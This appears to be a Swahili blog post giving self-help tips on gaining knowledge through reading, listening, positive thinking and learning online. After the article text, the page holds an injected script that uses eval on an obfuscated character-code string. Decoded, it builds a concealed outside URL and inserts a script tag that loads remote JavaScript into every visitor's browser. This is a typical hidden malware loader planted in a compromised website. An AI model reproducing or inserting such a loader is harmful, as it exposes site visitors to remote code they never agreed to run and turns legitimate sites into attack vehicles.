Maarifa ni muhimu kuliko chochote, watu wengi huamini kuwa na pesa,majumba,magari,kipaji madini au mali zinginezo ndiyo kila kitu.
Kiuhalisia ukiwa na maarifa haya hudumu kwa muda mrefu lakini vitu vingine vyote hapo huisha kwa muda fulani lakini maarifa huduma yaani mtu hufariki nayo.
Kuna namna mbalimbali ya kupata maarifa ambapo mtu huweza kuvuna aina tofautitofauti za ufahamu na maarifa ambayo yanaweza kuwa msaada mkubwa katika maisha yake kiuchumi,kibiashara na hata kijamii na mengineyo, hivyo basi leo nimekusogezea mbinu hizi kadhaa zitazo saidia kupata maarifa katika maisha yako;
1: Kusoma vitabu, Usomaji wa vitabu ni muhimu sana kwa kuwa hubadili mitazamo mbalimbali ya watu na kupelekea maarifa kukua zaidi, watu wengi ni wavivu sana kusoma lakini kwa bahati nzuri kwa sasa kuna vitabu vilivyo wekwa kwa mfumo wa sauti. hivyo basitenga muda soma.
2: Kusikiliza zaidi unapokutana na watu wenye ujuzi fulani wanapokuwa wakizungumzia vitu fulani pendelea kusikiliza zaidi kuliko kuongea hii itakusaidia kukusanya maarifa zaidi na kukufanya uwe bora.
3: Kuwa Chanya, hii ina maanisha kuyafikiria mambo vyema hata kama ni matatizo, mambo ya kuumiza, mambo ya kufurahisha yote uyaone kama mafunzo maana muda mwingine majaribu ni mtaji wa kujifunza.
4: Tumia mitandao,Watu wengi hutumia mitandao mbalimbali kuchati kujiburudisha lakini watu wachache hutumia kijifunza tutambe tu kutkana na maendeleo ya sayansi na teknolojia sasa maarifa mengi yamehamia mitandaoni sasa tujifunze kuitumia mitandao kwa upeo chanya.
Kiujumla Maarifa ni muhimu sana kwetu mana ukikosa maarifa kuangamia ni nje nje.
Tafuta Maarifa Uenjoy Duniani
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments